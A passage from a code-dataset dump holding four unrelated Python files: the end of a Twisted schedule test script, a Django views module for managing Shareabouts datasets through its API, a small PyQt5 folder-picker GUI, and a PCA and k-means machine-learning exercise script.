data)\n\t\tc.disconnect()\n\t\tdefer.returnValue(res)\n\texcept Exception as e:\n\t\tdefer.returnValue(e)\n\n@defer.inlineCallbacks\ndef main(uuid, num):\n\n\tfrom cheesepi.server.storage.models.target import Target\n\n\tresult = yield call_get_schedule(uuid, num)\n\n\tschedule = []\n\tif result['status'] == 'success':\n\t\tfor s in result['result']:\n\t\t\tschedule.append(Target.fromDict(s))\n\telse:\n\t\tprint(\"Fail.. :(\")\n\n\tprint(schedule)\n\n\tprint(pformat(result))\n\n\treactor.stop()\n\nif __name__ == \"__main__\":\n\timport argparse\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--uuid', type=str,\n\t\thelp=\"The uuid of the node to get the schedule for\")\n\tparser.add_argument('--num', type=int, default=1,\n\t\thelp=\"The length of the schedule\")\n\n\targs = parser.parse_args()\n\n\tif args.uuid is not None:\n\t\tfrom twisted.internet import reactor\n\n\t\treactor.callWhenRunning(main, args.uuid, args.num)\n\t\treactor.run()\n\telse:\n\t\tprint(\"No uuid specified.\")\n","repo_name":"liamjjmcnamara/cheesepi","sub_path":"cheesepi/tests/test_get_schedule.py","file_name":"test_get_schedule.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"15931985560","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.utils.decorators import method_decorator\nfrom django.views.generic import View, FormView, TemplateView\nfrom . import forms\nimport ujson as json\nimport requests\n\n\nAPI_ROOT = '/api/v1/'\n\n\nclass ShareaboutsApi (object):\n uri_templates = {\n 'password': r'{username}/password',\n 'dataset_collection': r'{username}/datasets/',\n 'dataset_instance': r'{username}/datasets/{slug}/',\n 'keys_collection': r'{username}/datasets/{dataset_slug}/keys/',\n 'place_collection': r'{username}/datasets/{dataset_slug}/places/?include_invisible=true&include_private_data=true',\n 'place_collection_table': r'{username}/datasets/{dataset_slug}/places/table?include_invisible=true&include_private_data=true',\n 'place_instance': r'{username}/datasets/{dataset_slug}/places/{pk}/?include_private_data=true',\n 'submission_collection': r'{username}/datasets/{dataset_slug}/places/{place_pk}/{type}/?include_invisible=true&include_private_data=true',\n 'submission_instance': r'{username}/datasets/{dataset_slug}/places/{place_pk}/{type}/{pk}/?include_private_data=true',\n 'all_submissions': r'{username}/datasets/{dataset_slug}/{type}/?include_private_data=true',\n 'all_submissions_table': r'{username}/datasets/{dataset_slug}/{type}/table?include_private_data=true',\n }\n\n def __init__(self, request=None, root='/api/v1/'):\n if request:\n self.uri_root = request.build_absolute_uri(root)\n else:\n self.uri_root = root\n\n def __unicode__(self):\n return ''.format(self.uri_root)\n\n def build_uri(self, name, *args, **kwargs):\n uri_template = self.uri_templates[name]\n uri_path = uri_template.format(*args, **kwargs)\n return (self.uri_root + uri_path)\n\n def authenticate(self, request):\n self.csrf_token = request.META.get('CSRF_COOKIE', '')\n self.cookies = request.META.get('HTTP_COOKIE', '')\n\n def send(self, method, url, data=None, content_type='application/json'):\n if data is not None and content_type == 'application/json':\n data = json.dumps(data)\n\n headers = {'Content-type': content_type,\n 'Accept': content_type}\n\n # Set authentication headers\n if hasattr(self, 'csrf_token') and hasattr(self, 'cookies'):\n headers.update({\n 'Cookie': self.cookies,\n 'X-CSRFToken': self.csrf_token\n })\n\n # Explicitly set the content length for delete\n if method == 'DELETE':\n headers.update({'Content-Length': '0'})\n\n # Add/update all data silently (do not generate activity)\n headers.update({'X-Shareabouts-Silent': 'True'})\n\n response = requests.request(method, url, data=data, headers=headers)\n return response\n\n def get(self, url, default=None):\n \"\"\"\n Returns decoded data from a GET request, or default on non-200\n responses.\n \"\"\"\n res = self.send('GET', url)\n res_json = res.text\n return (json.loads(res_json) if res.status_code == 200 else default)\n\n\n@login_required\ndef index_view(request):\n return redirect(reverse('manager_dataset_list', args=[request.user.username]))\n\n\n@login_required\ndef places_view(request, owner_name, dataset_slug):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n dataset_uri = api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n places_uri = api.build_uri('place_collection', username=owner_name, dataset_slug=dataset_slug)\n\n places = api.get(places_uri)\n dataset = api.get(dataset_uri)\n\n data_fields = set()\n for place in places:\n for field_name in place:\n data_fields.add(field_name)\n data_fields -= set(['id', 'submissions', 'dataset', 'url', 'location',\n 'visible', 'created_datetime', 'updated_datetime'])\n\n for place in places:\n place['submission_count'] = sum([s['length'] for s in place['submissions']])\n\n return render(request, \"manager/places.html\", {'places': places,\n 'dataset': dataset,\n 'data_fields': data_fields})\n\n\n@login_required\ndef keys_view(request, owner_name, dataset_slug):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n dataset_uri = api.build_uri('dataset_instance',\n username=owner_name,\n slug=dataset_slug)\n keys_uri = api.build_uri('keys_collection',\n username=owner_name,\n dataset_slug=dataset_slug)\n keys = api.get(keys_uri)\n dataset = api.get(dataset_uri)\n return render(request, \"manager/keys.html\", {'keys': keys,\n 'dataset': dataset})\n\n\nclass BaseDataBlobMixin (object):\n def make_data_fields_tuples(self, data):\n \"\"\"\n Take a dictionary of data and turn it into tuples containing a label, a\n key and a value. Reqires special_fields to be defined on the view.\n\n \"\"\"\n data_fields = []\n for key, value in data.items():\n if key not in self.special_fields:\n label = key.replace('_', ' ').title()\n data_fields.append((label, key, value))\n data_fields.sort()\n\n return data_fields\n\n\nclass BaseDataBlobFormMixin (BaseDataBlobMixin):\n def process_new_attr(self, num):\n data = self.data_blob\n\n meta_key = '_new_key{0}'.format(num)\n meta_val = '_new_val{0}'.format(num)\n\n new_key = data.get(meta_key, '').strip()\n new_val = data.get(meta_val, '')\n\n if meta_key in data:\n del data[meta_key]\n if meta_val in data:\n del data[meta_val]\n\n if new_key and new_val:\n data[new_key] = new_val\n\n return new_key, new_val\n\n def eliminate_unwanted_fields(self):\n \"\"\"\n Pull data out of the blob that we don't want to send to the Shareabouts\n service server.\n \"\"\"\n data = self.data_blob\n if 'csrfmiddlewaretoken' in data:\n del data['csrfmiddlewaretoken']\n if 'action' in data:\n del data['action']\n\n def process_specific_fields(self):\n \"\"\"\n Override this in the child view to do any extra processing necessary.\n \"\"\"\n raise NotImplementedError()\n\n def check_for_new_fields(self):\n data = self.data_blob\n\n for key, value in data.items():\n # Get rid of any empty data\n if value == '':\n del data[key]\n continue\n\n # Add any new keys to the data dictionary\n if key.startswith('_new_key'):\n num = key[8:]\n self.process_new_attr(num)\n continue\n\n def process_data_blob(self):\n \"\"\"\n Prepare place data to be sent to the service for creating or updating.\n \"\"\"\n self.eliminate_unwanted_fields()\n self.process_specific_fields()\n self.check_for_new_fields()\n\n\nclass PlaceFormMixin (BaseDataBlobFormMixin):\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n self.special_fields = ('id', 'location', 'submitter_name', 'name',\n 'created_datetime', 'updated_datetime', 'url',\n 'visible', 'submissions', 'dataset', 'attachments')\n return super(PlaceFormMixin, self).dispatch(request, *args, **kwargs)\n\n def process_specific_fields(self):\n data = self.data_blob\n\n # Fix the location to be something the server will understand\n location = {\n 'lat': data.get('lat'),\n 'lng': data.get('lng')\n }\n del data['lat']\n del data['lng']\n data['location'] = location\n\n # Fix the visibility to be either true or false (boolean)\n data['visible'] = ('visible' in data)\n\n def initial(self, request, owner_name, dataset_slug):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n dataset = api.get(self.dataset_uri)\n return render(request, \"manager/place.html\", {'dataset': dataset})\n\n def create(self, request, owner_name, dataset_slug):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Send the save request\n response = self.api.send('POST', self.places_uri, data)\n\n if response.status_code == 201:\n data = json.loads(response.text)\n place_id = data.get('id')\n\n messages.success(request, 'Successfully saved!')\n return redirect(reverse('manager_place_detail', args=[owner_name, dataset_slug, place_id]))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n def read(self, request, owner_name, dataset_slug, pk):\n # Retrieve the place data.\n place = self.api.get(self.place_uri)\n dataset = self.api.get(self.dataset_uri)\n\n # Arrange the place data fields for display on the form\n data_fields = self.make_data_fields_tuples(place)\n\n return render(request, \"manager/place.html\", {\n 'place': place,\n 'dataset': dataset,\n 'data_fields': data_fields\n })\n\n def update(self, request, owner_name, dataset_slug, pk):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Send the save request\n response = self.api.send('PUT', self.place_uri, data)\n\n if response.status_code == 200:\n messages.success(request, 'Successfully saved!')\n\n else:\n messages.error(request, 'Error: ' + response.text)\n\n return redirect(request.get_full_path())\n\n def delete(self, request, owner_name, dataset_slug, pk):\n # Send the delete request\n response = self.api.send('DELETE', self.place_uri)\n\n if response.status_code == 204:\n messages.success(request, 'Successfully deleted!')\n return redirect(reverse('manager_place_list', args=[owner_name, dataset_slug]))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n\nclass NewPlaceView (PlaceFormMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.dataset_uri = self.api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n self.places_uri = self.api.build_uri('place_collection', username=owner_name, dataset_slug=dataset_slug)\n\n return super(NewPlaceView, self).dispatch(request, owner_name, dataset_slug)\n\n def get(self, request, owner_name, dataset_slug):\n return self.initial(request, owner_name, dataset_slug)\n\n def post(self, request, owner_name, dataset_slug):\n return self.create(request, owner_name, dataset_slug)\n\n\nclass ExistingPlaceView (PlaceFormMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug, pk):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.dataset_uri = self.api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n self.place_uri = self.api.build_uri('place_instance', username=owner_name, dataset_slug=dataset_slug, pk=pk)\n\n return super(ExistingPlaceView, self).dispatch(request, owner_name, dataset_slug, pk)\n\n def get(self, request, owner_name, dataset_slug, pk):\n return self.read(request, owner_name, dataset_slug, pk)\n\n def post(self, request, owner_name, dataset_slug, pk):\n if request.POST.get('action') == 'save':\n return self.update(request, owner_name, dataset_slug, pk)\n elif request.POST.get('action') == 'delete':\n return self.delete(request, owner_name, dataset_slug, pk)\n else:\n # TODO ???\n pass\n\n\nclass ChangePasswordView (FormView):\n template_name = 'registration/change_password.html'\n form_class = forms.ChangePasswordForm\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.password_uri = self.api.build_uri('password', username=request.user.username)\n\n return super(ChangePasswordView, self).dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super(ChangePasswordView, self).get_context_data(**kwargs)\n next = self.request.GET.get('next', reverse('manager_index'))\n context['next'] = next\n return context\n\n def get_success_url(self):\n return self.request.POST.get('next', reverse('manager_index'))\n\n def form_valid(self, form):\n new_password = form.cleaned_data['new_password']\n self.api.send('PUT', self.password_uri, data=new_password, content_type='text/plain')\n return super(ChangePasswordView, self).form_valid(form)\n\n\n@login_required\ndef datasets_view(request, owner_name):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n\n datasets_uri = api.build_uri('dataset_collection', username=owner_name)\n\n datasets = api.get(datasets_uri)\n for ds in datasets:\n ds['manage_uri'] = reverse('manager_dataset_detail',\n kwargs={'owner_name': owner_name,\n 'dataset_slug': ds['slug']})\n return render(request, \"manager/datasets.html\", {'datasets': datasets})\n\n\nclass DataSetFormMixin (BaseDataBlobFormMixin):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, *args, **kwargs):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.datasets_uri = self.api.build_uri('dataset_collection', username=owner_name)\n self.special_fields = ('id', 'owner', 'display_name', 'slug')\n\n # TODO: just make this a keyword attribute with default value of None\n dataset_slug = None\n if args:\n dataset_slug = args[0]\n if 'dataset_slug' in kwargs:\n dataset_slug = kwargs['dataset_slug']\n\n if dataset_slug is not None:\n self.dataset_uri = self.api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n\n return super(DataSetFormMixin, self).dispatch(request, owner_name, *args, **kwargs)\n\n def read(self, request, owner_name, dataset_slug):\n # Retrieve the dataset data.\n dataset = self.api.get(self.dataset_uri)\n\n # Arrange the data fields for display on the form\n data_fields = self.make_data_fields_tuples(dataset)\n\n # Make sure that we refer to the v2 dataset root URL.\n if 'url' in dataset:\n dataset['url'] = dataset['url'].replace('api/v1', 'api/v2')\n\n return render(request, \"manager/dataset.html\", {\n 'dataset': dataset,\n 'data_fields': data_fields\n })\n\n def process_specific_fields(self):\n pass\n# owner = self.request.user.id # Needs to be a django.contrib.auth id\n# self.data_blob['owner'] = owner\n\n def initial(self, request, owner_name):\n return render(request, \"manager/dataset.html\", {'dataset': {'owner': {'username': owner_name}}})\n\n def create(self, request, owner_name):\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n response = self.api.send('POST', self.datasets_uri, data)\n\n if response.status_code == 201:\n data = json.loads(response.text)\n messages.success(request, 'Successfully saved!')\n return redirect(reverse('manager_dataset_detail', kwargs=(\n {'owner_name': owner_name, 'dataset_slug': data['slug']})))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n def update(self, request, owner_name, dataset_slug):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Send the save request\n response = self.api.send('PUT', self.dataset_uri, data)\n\n if response.status_code == 200:\n response_json = response.json()\n\n # Note that we end up with 200 even if the dataset is\n # renamed and we get redirected... this is *after* the redirect\n # completes.\n if response_json['slug'] == dataset_slug:\n messages.success(request, 'Successfully saved!')\n else:\n messages.warning(\n request,\n \"\"\"WARNING: The URL of this dataset has\n changed. This will affect lots of other URLs, notably\n your shareabouts client application(s) MUST be\n reconfigured to use the new dataset URL!\n It is: %s\"\"\" % response_json['url'],\n )\n new_url = reverse(\n 'manager_dataset_detail',\n kwargs={'owner_name': response_json['owner']['username'],\n 'dataset_slug': response_json['slug']})\n return redirect(new_url)\n else:\n messages.error(request, 'Error: ' + response.text)\n\n return redirect(request.get_full_path())\n\n def delete(self, request, owner_name, dataset_slug):\n # Send the delete request\n response = self.api.send('DELETE', self.dataset_uri)\n\n if response.status_code == 204:\n messages.success(request, 'Successfully deleted!')\n return redirect(reverse('manager_dataset_list', args=[owner_name]))\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n\nclass NewDataSetView (DataSetFormMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name):\n return super(NewDataSetView, self).dispatch(request, owner_name)\n\n def get(self, request, owner_name):\n return self.initial(request, owner_name)\n\n def post(self, request, owner_name):\n return self.create(request, owner_name)\n\n\nclass ExistingDataSetView (DataSetFormMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug):\n return super(ExistingDataSetView, self).dispatch(request, owner_name, dataset_slug)\n\n def get(self, request, owner_name, dataset_slug):\n return self.read(request, owner_name, dataset_slug)\n\n def post(self, request, owner_name, dataset_slug):\n if request.POST.get('action') == 'save':\n return self.update(request, owner_name, dataset_slug)\n elif request.POST.get('action') == 'delete':\n return self.delete(request, owner_name, dataset_slug)\n else:\n # TODO ???\n pass\n\n\nclass DataSetReportingView (TemplateView):\n template_name = 'manager/dataset_reports.html'\n\n def get_context_data(self, **kwargs):\n context = super(DataSetReportingView, self).get_context_data(**kwargs)\n\n request, owner_name, dataset_slug = \\\n self.request, self.kwargs['owner_name'], self.kwargs['dataset_slug']\n\n api = ShareaboutsApi(request)\n api.authenticate(request)\n dataset_uri = api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n places_uri = api.build_uri('place_collection', username=owner_name, dataset_slug=dataset_slug)\n\n places = api.get(places_uri)\n dataset = api.get(dataset_uri)\n\n context['places'] = places\n context['dataset'] = dataset\n\n context['places_json'] = json.dumps(places)\n context['dataset_json'] = json.dumps(dataset)\n\n return context\n\n\nclass SubmissionMixin (BaseDataBlobFormMixin):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug, place_id, submission_type, *args, **kwargs):\n self.api = ShareaboutsApi(request)\n self.api.authenticate(request)\n\n self.dataset_uri = self.api.build_uri('dataset_instance', username=owner_name, slug=dataset_slug)\n self.place_uri = self.api.build_uri('place_instance', username=owner_name, dataset_slug=dataset_slug, pk=place_id)\n\n # TODO: use a keyword arg with a default value of None for pk\n pk = None\n if args:\n pk = args[0]\n if 'pk' in kwargs:\n pk = kwargs['pk']\n\n if pk is not None:\n self.submission_uri = self.api.build_uri('submission_instance', username=owner_name, dataset_slug=dataset_slug, place_pk=place_id, type=submission_type, pk=pk)\n\n self.special_fields = ('id', 'submitter_name', 'url', 'visible',\n 'created_datetime', 'updated_datetime', 'type',\n 'place', 'dataset', 'attachments')\n return super(SubmissionMixin, self).dispatch(request, owner_name, dataset_slug, place_id, submission_type, *args, **kwargs)\n\n def index(self, request, owner_name, dataset_slug, place_id, submission_type):\n # Retrieve the dataset data.\n dataset = self.api.get(self.dataset_uri)\n\n # Retrieve the place data.\n place = self.api.get(self.place_uri)\n\n submission_sets = place['submissions']\n for submission_set in submission_sets:\n # Don't bother with sets we didn't ask for. If submission_type is\n # 'submissions', then all sets are requested.\n if submission_type not in (submission_set['type'], 'submissions'):\n submission_set['is_shown'] = False\n continue\n\n # Retrieve each submission set.\n join_char = '&' if '?' in submission_set['url'] else '?'\n submission_set['submissions'] = self.api.get(join_char.join([submission_set['url'], 'include_invisible=true']))\n\n # Process some data for display\n submission_set['is_shown'] = True\n submission_set['label'] = submission_set['type'].replace('_', ' ').title()\n\n for submission in submission_set['submissions']:\n # Arrange the submission data fields for display in the table\n submission['data_fields'] = self.make_data_fields_tuples(submission)\n\n # Make the dates a little prettier\n submission['created_datetime'] = submission['created_datetime'].replace('T', ' ').replace('Z', ' GMT')\n submission['updated_datetime'] = submission['updated_datetime'].replace('T', ' ').replace('Z', ' GMT')\n\n return render(request, \"manager/place_submissions.html\", {\n 'place': place,\n 'dataset': dataset\n })\n\n def initial(self, request, owner_name, dataset_slug, place_id, submission_type):\n # Retrieve the dataset data.\n dataset = self.api.get(self.dataset_uri)\n\n # Retrieve the place and submission data.\n place = self.api.get(self.place_uri)\n\n return render(request, \"manager/place_submission.html\", {\n 'type': None if submission_type == 'submissions' else submission_type,\n 'place': place,\n 'dataset': dataset\n })\n\n def process_specific_fields(self):\n data = self.data_blob\n\n # Grab the submission type off of the form. This will be in a hidden\n # field if the submission type was known before-hand, or in a text\n # field if the user had to enter it.\n self.actual_submission_type = data['type']\n del data['type']\n\n # Fix the visibility to be either true or false (boolean)\n data['visible'] = ('visible' in data)\n\n def create(self, request, owner_name, dataset_slug, place_id, submission_type):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Construct the submission_uri, taking into account the submission\n # type according to the POST variables.\n self.submissions_uri = self.api.build_uri('submission_collection', username=owner_name, dataset_slug=dataset_slug, place_pk=place_id, type=self.actual_submission_type)\n\n # Send the save request\n response = self.api.send('POST', self.submissions_uri, data)\n\n if response.status_code == 201:\n data = json.loads(response.text)\n submission_id = data.get('id')\n\n messages.success(request, 'Successfully saved!')\n return redirect(reverse('manager_place_submission_detail', args=[owner_name, dataset_slug, place_id, self.actual_submission_type, submission_id]))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n def read(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n # Retrieve the dataset data.\n dataset = self.api.get(self.dataset_uri)\n\n # Retrieve the place and submission data.\n place = self.api.get(self.place_uri)\n submission = self.api.get(self.submission_uri)\n\n # Arrange the submission data fields for display in the form\n data_fields = self.make_data_fields_tuples(submission)\n\n return render(request, \"manager/place_submission.html\", {\n 'place': place,\n 'dataset': dataset,\n 'submission': submission,\n 'type': submission_type,\n 'data_fields': data_fields\n })\n\n def update(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n # Make a copy of the POST data, since we can't edit the original.\n self.data_blob = data = request.POST.dict()\n self.process_data_blob()\n\n # Send the save request\n response = self.api.send('PUT', self.submission_uri, data)\n\n if response.status_code == 200:\n messages.success(request, 'Successfully saved!')\n\n else:\n messages.error(request, 'Error: ' + response.text)\n\n return redirect(request.get_full_path())\n\n def delete(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n # Send the delete request\n response = self.api.send('DELETE', self.submission_uri)\n\n if response.status_code == 204:\n messages.success(request, 'Successfully deleted!')\n return redirect(reverse('manager_place_submission_list', args=(owner_name, dataset_slug, place_id, submission_type)))\n\n else:\n messages.error(request, 'Error: ' + response.text)\n return redirect(request.get_full_path())\n\n\nclass SubmissionListView (SubmissionMixin, View):\n def get(self, request, owner_name, dataset_slug, place_id, submission_type):\n return self.index(request, owner_name, dataset_slug, place_id, submission_type)\n\n\nclass NewSubmissionView (SubmissionMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug, place_id, submission_type):\n return super(NewSubmissionView, self).dispatch(request, owner_name, dataset_slug, place_id, submission_type)\n\n def get(self, request, owner_name, dataset_slug, place_id, submission_type):\n return self.initial(request, owner_name, dataset_slug, place_id, submission_type)\n\n def post(self, request, owner_name, dataset_slug, place_id, submission_type):\n return self.create(request, owner_name, dataset_slug, place_id, submission_type)\n\n\nclass ExistingSubmissionView (SubmissionMixin, View):\n\n @method_decorator(login_required)\n def dispatch(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n return super(ExistingSubmissionView, self).dispatch(request, owner_name, dataset_slug, place_id, submission_type, pk)\n\n def get(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n return self.read(request, owner_name, dataset_slug, place_id, submission_type, pk)\n\n def post(self, request, owner_name, dataset_slug, place_id, submission_type, pk):\n if request.POST.get('action') == 'save':\n return self.update(request, owner_name, dataset_slug, place_id, submission_type, pk)\n elif request.POST.get('action') == 'delete':\n return self.delete(request, owner_name, dataset_slug, place_id, submission_type, pk)\n else:\n # TODO ???\n pass\n\n\ndef download_places_view(request, owner_name, dataset_slug):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n places_uri = api.build_uri('place_collection_table', username=owner_name, dataset_slug=dataset_slug)\n\n api_response = api.send('GET', places_uri, content_type='text/csv')\n places_csv = api_response.content\n\n response = HttpResponse(places_csv.decode('utf-8'), content_type='text/csv')\n response['Content-disposition'] = 'attachment; filename=places.csv'\n\n return response\n\ndef download_submissions_view(request, owner_name, dataset_slug, submission_type):\n api = ShareaboutsApi(request)\n api.authenticate(request)\n submissions_uri = api.build_uri('all_submissions_table', username=owner_name, dataset_slug=dataset_slug, type=submission_type)\n\n api_response = api.send('GET', submissions_uri, content_type='text/csv')\n submissions_csv = api_response.content\n\n response = HttpResponse(submissions_csv.decode('utf-8'), content_type='text/csv')\n response['Content-disposition'] = 'attachment; filename=' + submission_type + '.csv'\n\n return response\n","repo_name":"CrowdSpot/crowdspot-vagrant-box","sub_path":"apicrowdspot/src/sa_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18279645401","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QFileDialog, QLabel, QMessageBox\n\n\nclass FindImage(QWidget):\n def __init__(self):\n super().__init__()\n\n self.version = 'v1.0.0'\n self.lbl_choose = QLabel(self)\n self.lbl_origin = QLabel(self)\n self.lbl_target = QLabel(self)\n self.btn_start = QPushButton(self)\n self.btn_path = QPushButton(self)\n\n self.init_ui()\n\n def init_ui(self):\n self.lbl_choose.setText('请选择txt文件夹')\n self.lbl_choose.move(100, 80)\n\n self.lbl_origin.setText('请选择原始图文件夹')\n self.lbl_origin.move(100, 150)\n\n self.lbl_target.setText('请选择目标文件夹')\n self.lbl_target.move(100, 220)\n\n for widget in [self.lbl_choose, self.lbl_origin, self.lbl_target]:\n source_el_btn = QPushButton('请选择路径', self)\n source_el_btn.move(550, widget.geometry().y())\n source_el_btn.clicked()\n source_el_btn.clicked.connect(lambda: self.open_source_folder(widget))\n\n # self.btn_path = QPushButton('请选择路径', self)\n # self.btn_path.move(550, 80)\n # self.btn_path.clicked.connect(lambda: self.open_source_folder(self.lbl_choose))\n\n # self.btn_start.setText('开始')\n # self.btn_start.clicked.connect(self.handle_start)\n # self.btn_start.move(550, 550)\n self.setGeometry(300, 300, 800, 400)\n self.setWindowTitle(f'findImage_{self.version}')\n self.show()\n\n def open_source_folder(self, control):\n path = QFileDialog.getExistingDirectory(self, \"选取监听文件夹\", \"/\") # 起始路径\n control.setText(path)\n\n def handle_start(self):\n print('kkk', self.lbl_choose)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = FindImage()\n sys.exit(app.exec_())\n","repo_name":"pepsiyoung/python-tools","sub_path":"src/PyQT/app/find_image.py","file_name":"find_image.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32583029231","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 14 16:22:37 2019\r\n\r\n@author: 29132\r\n\"\"\"\r\n\r\nimport scipy.io as scio\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt \r\nfrom featureNorm import featureNormalize\r\nfrom PCA import pca\r\nfrom DL import drawLine\r\nfrom prdata import projectData,recoverData\r\nfrom Displaydata import displayData\r\nimport matplotlib.image as mpimg \r\nfrom kMeansInit import kMeansInitCentroids\r\nfrom runkmeans import runkMeans\r\n# ================== Part 1: Load Example Dataset ===================\r\ndata1=scio.loadmat('ex7data1.mat')\r\nX=data1['X']\r\nplt.figure(0)\r\nplt.plot(X[:,0],X[:,1],'bo')\r\nplt.axis([0.5,6.5,2,8])\r\n\r\n# =============== Part 2: Principal Component Analysis ===============\r\n#% Before running PCA, it is important to first normalize X\r\n[X_norm, mu, sigma] = featureNormalize(X);\r\n[U, S] = pca(X_norm);\r\ndrawLine(mu, mu + 1.5 * S[0] * U[:,0].T)\r\ndrawLine(mu, mu + 1.5 * S[1] * U[:,1].T)\r\nprint('U(:,1) ={},{}'.format(U[0][0], U[1][0]));\r\n\r\n#=================== Part 3: Dimension Reduction ===================\r\nplt.figure(1)\r\nplt.plot(X_norm[:, 0], X_norm[:, 1], 'bo');\r\nplt.axis([-4,3,-4,3])\r\n#Project the data onto K = 1 dimension\r\nK = 1;\r\nZ = projectData(X_norm, U, K);\r\nprint('Projection of the first example:{}'.format(Z[0]));\r\n\r\nX_rec = recoverData(Z, U, K)\r\nprint('Approximation of the first example:{} {}'.format(X_rec[0][0], X_rec[0][1]))\r\n#Draw lines connecting the projected points to the original points\r\nplt.figure()\r\nplt.plot(X_rec[:,0],X[:,1],'ro')\r\nfor i in range(X_norm.shape[0]):\r\n plt.plot(X_norm[i,:], X_rec[i,:],'k-', Linewidth=1)\r\n\r\n#=============== Part 4: Loading and Visualizing Face Data =============\r\ndata2=scio.loadmat('ex7faces.mat')\r\nX=data2['X']\r\ndisplayData(X[0:100, :]);\r\n\r\n#=========== Part 5: PCA on Face Data: Eigenfaces ===================\r\n[X_norm, mu, sigma] = featureNormalize(X)\r\n[U, S] = pca(X_norm)\r\ndisplayData(U[:, 0:36].T)\r\n\r\n#============= Part 6: Dimension Reduction for Faces =================\r\nK = 100;\r\nZ = projectData(X_norm, U, K);\r\n\r\n#==== Part 7: Visualization of Faces after PCA Dimension Reduction ====\r\nK = 100;\r\nX_rec = recoverData(Z, U, K);\r\n#Display normalized data\r\nplt.subplot(1, 2, 1);\r\ndisplayData(X_norm[0:100,:]);\r\nplt.title('Original faces');\r\n\r\n#Display reconstructed data from only k eigenfaces\r\nplt.subplot(1, 2, 2);\r\ndisplayData(X_rec[0:100,:]);\r\nplt.title('Recovered faces');\r\n\r\n#=== Part 8(a): Optional (ungraded) Exercise: PCA for Visualization ===\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nA = mpimg.imread('bird_small.png')\r\nK = 16; \r\nmax_iters = 10;\r\nimg_size=A.shape\r\nX =A.reshape(img_size[0] * img_size[1], 3);\r\ninitial_centroids=kMeansInitCentroids(X,K)\r\n[centroids, idx] = runkMeans(X, initial_centroids, max_iters,False)\r\nrandidx=np.arange(1000)\r\nnp.random.shuffle(randidx);\r\nfig = plt.figure()\r\nax = Axes3D(fig)\r\nfor i in range(len(randidx)):\r\n ax.scatter(X[randidx[i]][0],X[randidx[i]][1],X[randidx[i]][2])\r\nplt.title('Pixel dataset plotted in 3D. Color shows centroid memberships')\r\n\r\n# === Part 8(b): Optional (ungraded) Exercise: PCA for Visualization ===\r\n[X_norm, mu, sigma] = featureNormalize(X)\r\n[U, S] = pca(X_norm);\r\nZ = projectData(X_norm, U, 2);\r\nplt.figure()\r\nfor i in range(len(randidx)):\r\n plt.scatter(Z[randidx[i],0],Z[randidx[i],1])\r\nplt.title('Pixel dataset plotted in 2D, using PCA for dimensionality reduction')","repo_name":"xiaoxue11/machine_learning","sub_path":"ex7/ex7_pca.py","file_name":"ex7_pca.py","file_ext":"py","file_size_in_byte":3370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} 